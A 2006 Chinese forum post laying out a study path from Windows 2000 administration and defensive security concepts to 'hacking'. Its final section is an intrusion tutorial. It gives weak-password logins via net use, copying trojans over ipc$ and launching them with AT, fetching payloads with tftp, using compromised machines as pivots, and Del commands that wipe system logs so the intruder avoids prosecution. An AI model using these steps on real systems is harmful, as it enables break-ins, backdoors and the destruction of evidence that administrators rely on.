服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

zgldragon 发表于 2006-6-7 18:33:53

如何学习,成为一位电脑高手?这里给您答案

<SPAN class=tpc_content><FONT size=2>基础 <BR>如何去学习 <BR>·要有学习目标 <BR>·要有学习计划 <BR>·要有正确的心态 <BR>·有很强的自学能力 <BR><BR>学习目标 <BR>·1.明确自己的发展方向(你现在或者将来要做什么,程序员?安全专家?网络黑客等) <BR>·2.自己目前的水平和能力有多高 <BR>·能简单操作windows2000 <BR>·能简单配置windows2000的一些服务 <BR>·能熟练的配置Windows2000的各种服务 <BR>·能熟练配置win2000和各种网络设备联网 <BR>·能简单操作Linux,Unix,Hp-unix, Solaris中的一种或者多种操作系统 <BR>·能配置cicso,huawei,3com,朗迅等网络设备 <BR>·会简单编写C/C++,Delphi,Java,PB,VB,Perl <BR>·能简单编写Asp,Php,Cgi和script,shell脚本 <BR><BR><BR>·3.必须学会不相信态度,尊重各种各样的能力 <BR>·不要为那些装模做样的人浪费时间 <BR>·尊重别人的能力, <BR>·会享受提高自己能力的乐趣. <BR>·在知道了自己的水平和能力之后就要开始自己的目标了 <BR>·--------安全专家 <BR>·--------黑客 <BR>·--------高级程序员 <BR>·黑客是建设网络,不是破坏网络, 破坏者是骇客; <BR>·黑客有入侵的技术,但是他们是维护网络的,所以和安全专家是差不多的; <BR>·因为懂得如何入侵才知道如何维护 <BR>·因为懂得如何维护才更要了解如何入侵 <BR>·这是 黑客与安全专家的联系 <BR>·但,他们都是在会编程的基础上成长的! <BR>·下面我们开始我们的学习计划! <BR><BR>学习计划 <BR>有了学习计划才能更有效的学习 <BR><BR>安全学习计划 <BR>不奢求对win98有多么精通,我们也不讲解win98如何应用,如何精通,我们的起步是win2000 s <BR>erver,这是我们培训的最低标准,你对英语有一定的了解也是必不可少 <BR><BR><BR>最基础 <BR>·a.会装win2000,知道在安装的时候有两种分区格式,NTFS与FAT32 及他们的区别,知道win2 <BR>000可以在安装的时候分区,格式化硬盘, 可以定制安装,可以定制自己需要安装的一些组件 <BR>,如果有网络适配器,可以直接加入域中 学习点:NTFS和FAT32分区的不同 各个组件的作用 <BR>域的定义 <BR>·b.知道如何开,关机 知道注销的用处 <BR>·c.知道win2000下面各主要目录的作用 Documents and Settings,WINNT,system32 Progra <BR>m Files <BR>·d.知道管理工具里面各个组件的定义 <BR>·e.学会应用命令提示符cmd(dos) <BR>·f.知道计算机管理里面的各个选项的不同<BR>·g.知道win2000强大的网络管理功能 <BR>·h.能非常熟练的操作win2000 <BR>·i.知道IP地址,子网掩码,网关和MAC的区别 <BR><BR>进阶 <BR>·A.配置IIS,知道各个选项的作用 <BR>·B.配置DNS,DHCP <BR>·C.配置主控制域,辅助域 <BR>·D.配置DFS <BR>·E.配置路由和远程访问 <BR><BR><BR>·F.配置安全策略IPSEC <BR>·G.配置service(服务) <BR>·H.配置磁盘管理,磁盘分额 <BR>·i. 配置RAID(0,1,0+1,5) <BR>·J.路由器的安装与简单配置 <BR>·K.交换机的安装与简单配置 <BR>·L.常见的VPN,VLAN,NAT配置 <BR>·M.配置常见的企业级防火墙 <BR>·N.配置常见的企业级防病毒软件 <BR><BR>高级 <BR>·之前我们学到的是任何一个想成为网络安全专家和黑客基本知识中的一部分 <BR>·你作到了吗?? <BR>·如果你做到了,足以找到一份很不错的工作! <BR><BR>配置负载均衡 <BR>·配置WIN2000+IIS+EXCHANGE+MSSQL+SERVER-U+负载均衡+ASP(PHP.CGI)+CHECK PIONT(ISA <BR>SERVER) · <BR>·配置三层交换网络 · <BR>·配置各种复杂的网络环境 <BR>·能策划一个非常完整的网络方案 · <BR>·能独自组建一个大型的企业级网络 · <BR><BR><BR>·能迅速解决网络中出现的各种疑难问题 <BR><BR>结束 <BR>·在你上面的都学好了,你已经是一个高级人才了,也是我们VIP培训的目标! <BR>·可以找到一份非常好的工作 <BR>·不会再因为给女朋友买不起玫瑰而发愁了! <BR><BR>安全: <BR>导读 <BR>·系统安全服务(SYSTEM) <BR>·防火墙系统(FIREWALL) <BR>·入侵检测(IDS) <BR>·身份验证(CA) <BR>·网站监控和恢复(WEBSITE) <BR>·安全电子商务(E-BUSINESS) <BR>·安全电子邮件(E-MAIL) <BR>·安全办公自动化(OA) <BR>·Internet访问和监控(A&amp;C) <BR>·病毒防范(VIRUS) <BR>·虚拟局域网(VPN) <BR><BR>系统安全服务 <BR><BR><BR>·系统安全管理 <BR>·系统安全评估 <BR>·系统安全加固 <BR>·系统安全维护 <BR>·安全技能学习 <BR><BR>系统安全管理 <BR>·信息系统安全策略 <BR>·信息系统管理员安全手册 <BR>·信息系统用户安全手册 <BR>·紧急事件处理流程 <BR><BR>系统安全评估 <BR>1、系统整体安全分析 <BR>· 分析用户的网络拓扑结构,以找出其结构性及网络 配置上存在的安全隐患。 <BR>· 通过考察用户信息设备的放置场地,以使得设备物理上是安全的。 <BR>· 分析用户信息系统的管理、使用流程,以使得系统 能够安全地管理、安全地使用 <BR>2、主机系统安全检测 <BR>· 通过对主机进行安全扫描,以发现系统的常见的安全漏洞。 <BR>· 对于特定的系统,采用特别的工具进行安全扫描。 <BR>· 根据经验,对系统存在的漏洞进行综合分析。 <BR>· 给出系统安全漏洞报告。 <BR><BR><BR>· 指出各个安全漏洞产生的原因以及会造成的危险。 <BR>· 给出修复安全漏洞的建议 <BR>3、网络设备安全检测 <BR>· 通过对网络进行安全扫描,以发现网络设备的安全漏洞。 <BR>· 根据经验,对网络设备存在的漏洞进行综合分析。 <BR>· 给出网络设备安全漏洞报告。 <BR>· 指出各个安全漏洞产生的原因以及会造成的险。 <BR>· 给出修复安全漏洞的建议。 <BR><BR>安全系统加固 <BR>·为用户系统打最新安全补丁程序。 <BR>·为用户修复系统、网络中的安全漏洞。 <BR>·为用户去掉不必要的服务和应用系统。 <BR>·为用户系统设置用户权限访问策略。 <BR>·为用户系统设置文件和目录访问策略。 <BR>·针对用户系统应用进行相应的安全处理。 <BR><BR>安全系统维护 <BR>·防火墙系统维护,安全日志分析 <BR>·IDS系统维护,安全日志分析 <BR>·VPN系统维护,安全日志分析 <BR>·认证系统维护,安全日志分析 <BR><BR><BR>·服务器、主机系统,安全日志分析 <BR>·其它各类安全设施维护及日志分析 <BR><BR>安全技能培训 <BR>·网络安全基础知识 <BR>·网络攻击手段演示和防范措施 <BR>·防火墙的原理和使用 <BR>·VPN的原理和使用 <BR>·漏洞扫描工具的原理和使用 <BR>·IDS(入侵检测系统)的原理和使用 <BR>·身份认证系统的原理和使用 <BR>·防病毒产品的原理和使用 <BR>·系统管理员安全培训 <BR>·一般用户安全培训 <BR><BR>防火墙系统 <BR>·防火墙的定义 <BR>·防火墙的分类 <BR>·包过滤防火墙 <BR>·应用网关防火墙 <BR>·状态检测防火墙 <BR>·一般企业防火墙配置 <BR><BR><BR>·政府机构防火墙配置 <BR>·涉密网络保密网关配置 <BR>·高可用性和负载均衡防火墙系统 <BR>·高速防火墙系统 <BR><BR>防火墙的定义 <BR>·用以连接不同信任级别网络的设备。 <BR>·用来根据制定的安全规则对网络间的通信进行控制 <BR><BR>防火墙的分类 <BR>·包过滤 (Packet Filters) <BR>·应用网关 (Application Gateways) <BR>·状态检测(Stateful Inspection) <BR><BR>包过滤防火墙 <BR>·包 过 滤 技 术 <BR>·主要在路由器上实现,根据用户定义的内容(如IP地址、端口号)进行过滤。包过滤在网 <BR>络层进行包检查与应用无关。 <BR>· 优 点 <BR>· 具有良好的性能和可伸缩性。 <BR>· 缺点 <BR>· 由于包过滤技术是对应用不敏感的,无法理解特定通讯的含义,因而安全性很差。 <BR><BR><BR>应用网关防火墙 <BR>·应用网关技术 <BR>·第二代防火墙技术,其在应用的检查方面有了较大的改进,能监测所有应用层,同时对应 <BR>用“内容”(Content Information)的含义引入到了防火墙策略的决策处理。 <BR>· 优点 <BR>· 安全性比较高。 <BR>· 缺点 <BR>· 1、该方法对每一个请求都必须建立两个连接,一个从客户端到防火墙系统,另一个从 <BR>防火墙系统到服务器,这会严重影响性能。 <BR>· 2、防火墙网关暴露在攻击者之中。 <BR>· 3、对每一个代理需要有一个独立的应用进程或 daemon 来处理, 这样扩展性和支持 <BR>新应用方面存在问题。 <BR><BR>检测状态防火墙 <BR>· 属第三代防火墙技术,克服了以上两种方法的缺点,引入了OSI全七层监测能力,同时 <BR>又能保持 Client/Server的体系结构,也即对用户访问是透明的。 <BR>· 防火墙能保护、限制其他用户对防火墙网关本身的访问。 <BR>· 状态检测技术在网络层截获数据包后交给INSPECT Engine,通过 INSPECT Engine 可以 <BR>从数据包中抽取安全决策所需的所有源于应用层中的状态相关信息,并在动态状态表中 维 <BR>持这些信息以提供后继连接的可能性预测。该方法能提供高安全性、高性能和扩展性、高伸 <BR>缩性的解决方案。 <BR><BR><BR>入侵检测系统 <BR>·处理攻击时遇到的典型问题 <BR>·解决入侵的方法和手段 <BR>·基于网络的入侵检测 <BR>·基于主机的入侵检测 <BR>·入侵检测系统典型配置 <BR><BR>处理攻击时遇到的问题 <BR>·获得的信息不足 <BR>·不知到网络上发生了什么事。 <BR>·无法判定系统是否已经被入侵。 <BR>·信息不准确 <BR>·人员少 <BR>·没有足够的人员维护管理。 <BR>·缺乏规范的处理程序 <BR>·发现攻击时如何反应? <BR>·下一步该如何处理? <BR><BR>解决入侵的方法和手段 <BR>·采用入侵实时入侵监控系统(IDS) <BR>·对系统、网络中发生的事件进行实时监控。 <BR><BR><BR>·当发生入侵事件时能即时反应。 <BR>·对入侵事件进行详细记录并跟踪。 <BR><BR>基于主机的入侵检测 <BR>·软件模块安装在包含有重要数据的主机上 <BR>·监视操作系统的日志以发现攻击的特征。 <BR>·监视代理所处主机上的所有进程和用户. <BR>·监视暴力登录攻击(brute-force login), 试图改变或绕过安全设定,及特权的滥用等 <BR>。 <BR>·当新的日志产生时,为了减小对CPU的影响,代理程序暂时中断。 <BR><BR>基于网络的入侵检测 <BR>·软件安装在专门的主机上,放置于关键的网段 <BR>·将配置该软件主机的网卡设置为混杂模式,使得该主机能接受网段上所有的包。 <BR>·分析数据包以判断是否有黑客攻击。 <BR>·监视网段上的所有数据。 <BR>·对网络的流量无任何影响。 <BR>·能检测到 denial of service attacks, unauthorized access attempts, pre-attack s <BR>cans等攻击。 <BR><BR>身份认证系统 <BR>·用户身份认证的方法 <BR><BR><BR>·不同认证方法的安全级别 <BR>·用户身份认证的常用方式 <BR>·解决问题的方法 <BR>·目前比较成熟的双因素认证方法 <BR><BR>用户身份验证 <BR>·你知道的一些东西 <BR>· 密码, 身份证号,生日 <BR>·你有的一些东西 <BR>· 磁卡, 智能卡,令牌, 钥匙 <BR>·你独有的一些东西 <BR>· 指纹,声音,视网膜 <BR><BR>密码是不安全的 <BR>·可以破解密码的工具太多 <BR>·大多密码在网络中是明文传输的 <BR>·密码可以网络离线时被窥测 <BR>·密码和文件从PC和服务器上被转移了 <BR>·好记的密码容易被猜到,不易猜测的密码又太难记 <BR><BR>解决方法 <BR>·使用混合的工具:如IC卡+PIN <BR><BR><BR>网站监控与恢复系统 <BR>·典型的Web服务器应用 <BR>·Web服务器存在的安全问题 <BR>·网站安全解决方法 <BR><BR>典型web服务器应用 <BR>·Internet--&gt;路由器--&gt;防火墙--&gt;web站点 <BR>· | <BR>· | <BR>· 内部网 <BR>·所有的放在防火墙后面 <BR><BR><BR>Web服务器存在的安全问题 <BR>· 网页被非法篡改是网站内容提供者最头痛的问题。在采用防火墙后,Web服务器本身的漏 <BR>洞成为了网站被黑的主要问题。 <BR>· Web应用服务器(如IIS,Apache中存在着大量的安 全漏洞.) <BR>· 用户自己开发的CGI、ASP、PHP应用中存在着大量潜在的漏洞。 <BR><BR>网站安全 <BR>·采用Web服务器监控与恢复系统 <BR><BR><BR>·该系统提供对网站文件内容的实时监控,发现被改动后立即报警并自动恢复。 <BR><BR>电子商务安全系统 <BR>·典型的电子商务应用 <BR>·电子商务中存在的安全问题 <BR>·电子商务的安全解决方法 <BR>·实时数据交换系统 <BR><BR>典型电子商务应用 <BR>·Internet---&gt;防火墙---&gt;Web服务器 <BR>· || | <BR>· || | <BR>· 内部网(数据库) <BR><BR>电子商务中存在的安全问题 <BR>·1、Web服务器端 <BR>·Web应用服务器(如IIS、Apache中存在着大量的安全漏洞。用户自己开发的CGI、ASP、PH <BR>P应用中存在着潜在的漏洞。 <BR>· 黑客通过这些漏洞攻击Web服务器,可非法篡改网页,造成恶劣影响,动摇了电子商务使 <BR>用者的信心。 <BR>· 甚至可获得Web服务器上大量的敏感资料,如用户的信用卡号,用以连接内部数据库的帐 <BR>号和口令。 <BR><BR><BR>· 可能通过控制Web服务器,来攻击内部数据库。 <BR><BR>电子商务中存在的安全问题 <BR>·2、SSL协议 <BR>·SSL加密强度低。由于浏览器默认的加密模块只支持40位的低强度加密,而且即使在浏览 <BR>器中安装更高位的加密模块,由于WEB服务器不提供对高位SSL链接的支持同样无法实现高强 <BR>度SSL加密链接。 <BR>· 无法解决电子商务中的用户签名。SSL链接建立WEB服务器和用户浏览器之间的安全通道 <BR>只能保证在安全通道内的信息不被窃听或篡改,并不能对用户发送的信息进行签名以保证信 <BR>息的有效性和不可抵赖性,而这正是电子商务中必须解决的问题。 <BR><BR>电子商务的安全解决方法 <BR>·将WEB服务器分为两部分:一般内容的WEB服务器和交易WEB服务器。 <BR>· 一般内容的WEB服务器放置在DMZ区内,采用WEB站点监控和恢复系统保护,防止主页被非 <BR>法改动。 <BR>· 交易WEB服务器放置在内部网内,通过一台物理分隔的实时数据交换系统将其与DMZ区相 <BR>连。 <BR>· 在客户机和服务器端安装SSL代理,从而获得128位的高强度加密通道 <BR><BR>实时数据交换系统 <BR>·将系统外部 Web服务器和内部应用Web服务器物理隔开. <BR>·外部Web服务器用于存放一般的信息,内部Web服 务器用于存放敏感信息,并和内部数据 <BR><BR><BR>库连接。 <BR>·外部用户通过http访问位于DMZ区内的一般Web服务器。 <BR>·当进行交易时,用户需访问位于内部网内的应用服务器。 <BR>·https连接首先到达实时数据交换系统的虚拟外部Web服务器,实时数据交换系统将https <BR>协议解开,只将https连接的数据内容拷贝到虚拟内部Web服务器,虚拟内部Web服务器将使 <BR>用该数据重新发起https连接到实际的内部应用Web服务器. <BR>·内外通过实时数据交换系统进行数据交换,无任何协议和连接穿过实时数据交换系统。 <BR>·即使DMZ区的Web服务器受到攻击, 攻击者也的不到任何有用的信息 <BR><BR>安全电子邮件系统 <BR>·电子邮件的安全问题 <BR>·安全电子邮件的解决方法 <BR>·一个安全邮件的使用过程 <BR><BR>电子邮件的安全问题 <BR>·如何保证发送的敏感信息不被泄漏 <BR>·如何保证发送的信息不被篡改 <BR>·如何确认发件人的真实身份 <BR>·如何防止发件人的抵赖行为 <BR><BR>安全电子邮件的解决方法 <BR>·将PKI体系应用到邮件系统中 <BR><BR><BR>·邮件的加密和解密以实现数据的保密。 <BR>·邮件的数字签名(鉴别)实现发件人认证和不可抵赖。 <BR>·完整性校验功能防止信息传输过程中被篡改可靠的安全性。 <BR>·采用公开密钥和对称密钥相结合的密钥体系。 <BR>·支持128bit对称密钥算法和1024bit公开密钥算法。 <BR><BR>办公自动化系统的安全问题 <BR>· 如何保证发送的敏感信息不被泄漏 <BR>· 如何保证发送的信息不被篡改 <BR>· 如何确认发件人的真实身份 <BR>· 如何防止发件人的抵赖行为 <BR><BR>安全办公自动化系统的解决方法 <BR>·将PKI体系应用到办公自动化系统中 <BR>·工作流信息的加密和解密以实现数据保密 <BR>·工作流信息的数字签名(鉴别)实现发件人认证和不可抵赖。 <BR>·完整性校验功能防止信息传输过程中被篡改可靠的安全性。 <BR>·采用公开密钥和对称密钥相结合的密钥体系 <BR>·支持128bit对称密钥算法和1024bit公开密钥算法。 <BR><BR>Internet访问及控制系统 <BR>·Internet使用存在的问题 <BR><BR><BR>·Internet使用的解决方法 <BR>·内容缓存系统 <BR>·Internet站点过滤系统 <BR><BR>Internet访问存在的问题 <BR>·Internet接入带宽不足,访问比较慢。 <BR>·大量的用户访问相同的内容,造成带宽的进一步拥挤。 <BR>·在上班时间里大量的Internet访问是与业务无关的。 <BR>·有人使用公司的Internet系统访问色情网站。 <BR>·有人使用公司的Internet系统访问反动站点。 <BR>·管理人员无法知道Internet系统的使用情况。 <BR><BR>Internet访问的解决方法 <BR>· 对于问题一,采用内容缓存系统。 <BR>· 对于问题二,采用Internet 站点过滤系统。 <BR><BR>内容缓存系统 <BR>·1、Client 发起http连接请求 <BR>·2、Proxy 收到请求后将检查内部缓存内是否有所需内容,若有,则返还给Client。 <BR>·3、若无,则Proxy根据请求向目的服务器发起请求。 <BR>·4、Web服务器将内容返回到Proxy服务器。 <BR>·5、Proxy服务器将得到的内容发回给Client,并在自己的缓存中保存一份。 <BR><BR><BR>Internet站点过滤系统 (一) <BR>·1、Client 发起http连接请求 <BR>·2、连接到达防火墙时防火墙将URL送到WebSense Server 检查。 <BR>·3、WebSense 将审查结果返回到防火墙。 <BR>·4、防火墙根据其策略决定是否让该连接通过。 <BR>Internet站点过滤系统 (二) <BR>·1、Client 发起http连接请求 <BR>·2、Proxy 受到请求后将URL送到WebSense Server检查。 <BR>·3、Proxy根据返回的结果决定是否接收该连接请求。 <BR><BR>病毒防范系统 <BR>· 互连网时代对防病毒系统的要求 <BR>· 计算机病毒解决方法 <BR>· 典型病毒防范系统部署 <BR><BR>互联网时代对防病毒系统的要求 <BR>· 由于计算机的联网使用,使得病毒传播的途径大为增多:网络文件共享、电子邮件、Int <BR>ernet文件下载,传播速度也大为加快。 <BR>· 新病毒的出现速度加快,用户的防病毒软件的病毒特征码没能及时更新。 <BR>· 目前已出现了恶意的Java、ActiveX,当使用者浏览到包含这些代码的网页时,会造成安 <BR>全问题。 <BR><BR><BR>· 一些来历不明的电子邮件程序或下载的程序中带有特洛依木马,可能会造成受害者的主 <BR>机被他人控制。 <BR><BR>计算机病毒解决方法 <BR>· 从系统的观点考虑病毒的防范,在所有病毒传输的途径上均配置防病毒软件,如客户端 <BR>(Win98、 · Win2000)、文件服务器(NT、Netware)、邮件服务器(Exchange、Lotus <BR>Notes)、Internet接入系统(Proxy、Firewall)等。 <BR>· 整个病毒防范系统采用集中管理的方式,病毒特征码统一更新,安全策略集中设定,从 <BR>而使得整个网络系统的病毒特征码得到快速更新。 <BR>· 通过在客户端的浏览器和Proxy、Firewall中嵌入病毒检查软件,来防范下在程序中带有 <BR>的病毒和可能的恶意Java、ActiveX等可执行代码的攻击。 <BR><BR>VPN(虚拟私有网) <BR>· 数据加密分类 <BR>· 物理线路加密 <BR>· 数据链路加密 <BR>· 网络层加密—IPSec <BR>· 传输层加密—SSL <BR><BR>数据加密类型 <BR>·物理层-&gt;物理层 物理线路加密 <BR>·数据链路层-&gt;数据链路层 (路由器访问) <BR><BR><BR>·在数据链路层(如PPP)进行加密 L2TP、PPTP、L2F <BR>·网络层-&gt;网络层(路由器 防火墙 主机) <BR>·在网络层 (如IP)进行加密 IPSec <BR>·传输层-&gt;传输层 (对TCP进行加密 SSL) <BR>·应用层-&gt;应用层(在应用层 (如TCP)进行加密 S/MIME、SET、SSH) <BR><BR>物理线路加密 <BR>· DDN 加密机 <BR>· 帧中继加密机 <BR>· 异步拨号Modem <BR>· ISDN线路密码机 <BR>· ATM加密机 <BR><BR>注:传输层加密 <BR>·Secure Sockets Layer (SSL) 是一个端到端的Internet 安全协议,通过采用数字证书, <BR>它提供了数据加密、身份认证的功能。SSL建立在传输层,它为客户机和服务器在应用级建 <BR>立起一个端到断的安全会话。 <BR>·SSL代理—128位的高强度加密模块 <BR><BR>结束语·恭喜你: <BR>·学完这些并且可以熟练应用,已经是一个真正的网络安全专家了! <BR>·希望此时的你旁边有个温柔稍有点调皮的女朋友,为这孤独而寂寞的网络添加一点跳动的 <BR><BR><BR>色彩! <BR><BR>黑客编: <BR>必须要掌握的几个命令 <BR>·Net <BR>·netsh <BR>·Ftp <BR>·hostname <BR>·Telenet(nc) <BR>·tracert <BR>·At <BR>·Tftp <BR>·Netstat <BR>·Regedit <BR>·Ping <BR><BR>必须要掌握的几个协议 <BR>·http <BR>·dns <BR>·ftp <BR>·Pop <BR>·Smtp <BR><BR><BR>·Icmp <BR>·Udp <BR>·tcp <BR><BR>开始 <BR>·掌握了黑客攻击的方式和手段后,那么学习黑客就简单多了! <BR>·因为你掌握了这些,剩余的就是使用工具入侵 <BR>·熟悉掌握一套自己用的黑客工具 <BR><BR>高级 <BR>·自己编写专用的黑客工具 <BR>·自己发现系统漏洞 <BR><BR>黑客入侵手段 <BR>·收集信息: <BR>· 收集要入侵的目标信息 <BR>· IP,域名,端口,漏洞,位置 <BR><BR>弱口令 <BR>·在nt\2000\xp\2003中弱口令可以用 <BR>·Net use \ip “password” /user:user <BR>·如果目标机开3389服务,可以直接连接 <BR><BR><BR>·在sql的sa弱口令,可以用sql连接器直接 ·登陆 <BR><BR>后门木马 <BR>·如果有ipc$共享,可以copy过去木马后门 <BR>·用at启动 <BR>·AT \ip time /INTERACTIVE <BR>·如果可以得到shell,也可以用tftp <BR>·Tftp.exe –i ip get *.* *.* <BR>·然后直接安装 ·如果有3389,可以自己建一个iis,下载 直接运行 <BR><BR>密码破解 <BR>·远程破解mysql,mssql,ftp,mail,共享密码 <BR>·本地破解管理员(administrator)密码 <BR><BR>缓冲溢出 <BR>·可以用缓冲溢出攻击, <BR>·比如流行的webdev,rdcom模块漏洞 <BR>·可以直接得到system管理权限 <BR>·缓冲溢出后的一般现象是: <BR>·Microsoft Windows 2000 <BR>(C) Copyright 1985-2000 Microsoft Corp. <BR>C:\WINNT\system32&gt; <BR><BR><BR>Web服务漏洞 <BR>·例如: <BR>·Unicode漏洞遍历磁盘和执行程序 <BR>·二次编码漏洞遍历磁盘和执行程序 <BR>·.HTR漏洞查看源代码 <BR><BR>嗅探监听 <BR>·例如: <BR>·针对web监听 <BR>·针对mail监听 <BR>·工具如:sinffer , iris <BR><BR>欺骗攻击 <BR>·例如: <BR>·运用arp欺骗攻击 <BR><BR>伪装欺骗 <BR>·常见的如:mail病毒 <BR>·把一个文件改名字甚至图标,欺骗对方执行 <BR><BR>社会工程学 <BR><BR><BR>·例如: <BR>·QQ聊天诱惑 <BR>·EMAIL信息 <BR>·电话 <BR>·诱惑 <BR><BR>拒绝服务 <BR>·例如: <BR>·Dos攻击 <BR>·Ddos攻击 <BR><BR>利用跳板 <BR>·利用自己的肉鸡作为跳板攻击别的机器 <BR>·My PC------&gt;跳板(肉鸡)---&gt;目标 <BR><BR>路由器漏洞 <BR>·如: <BR>·原始密码 <BR>·程序漏洞 <BR><BR>防火墙 <BR>·利用欺骗攻击防火墙,导致防火墙功能失效 <BR><BR><BR>·利用防火墙的模块漏洞 <BR><BR>unix/linux <BR>·NetWare Linux unix solais Solaris hp-unix Aix 等 <BR>·这些目前先不讲解 <BR><BR>精通黑客工具 <BR>·必须有一套自己可以完全掌握的黑客工具 <BR>·如端口扫描 Nscan,bluescanport <BR>·监听工具:sinffer iris <BR>·telnet工具:nc <BR>·扫描工具:sss,nmap, LANguard <BR>·后门工具:radmin,winshell <BR>·密码破解:lc4 <BR>·远程管理:pcanywhere <BR>·会使用各种经典的黑客工具 <BR><BR>清除日志 <BR>·在你入侵机器以后,离开的时候,要完全清除 <BR>·自己在那台机器上留下的痕迹 <BR>·例如清除 <BR>·Del C:\WINNT\system32\LogFiles\*.* <BR><BR><BR>·Del C:\WINNT\system32\*.log <BR>·Del C:\WINNT\system32\*.txt <BR>·Del C:\WINNT\*.log <BR>·Del c:\winnt\*.txt <BR><BR>如果你不清除日志 <BR>·当目标机器的管理员发现你的证据 <BR>·完全可以让你在大墙内渡过一段日子 <BR><BR>黑客 <BR>·当你完全掌握这些后 <BR>·你就成为了一名小黑客 <BR><BR>高级 <BR>·编写自己的黑客工具 <BR>·发现系统漏洞 <BR><BR>高级黑客 <BR>·目前你足以成为一个高级黑客了 <BR><BR>真正的黑客 <BR>·精通各种网络协议 <BR><BR><BR>·精通操作系统 <BR>·精通编程技术 <BR>·精通安全防护 <BR>·不搞破坏 <BR>·挑战技术难题 </FONT></SPAN>

雨雪霏霏 发表于 2006-4-11 09:10:57

re:如何学习,成为一位电脑高手?这里给您答案

都是我的偶像啊。。。佩服啊
页: [1]
查看完整版本: 如何学习,成为一位电脑高手?这里给您答案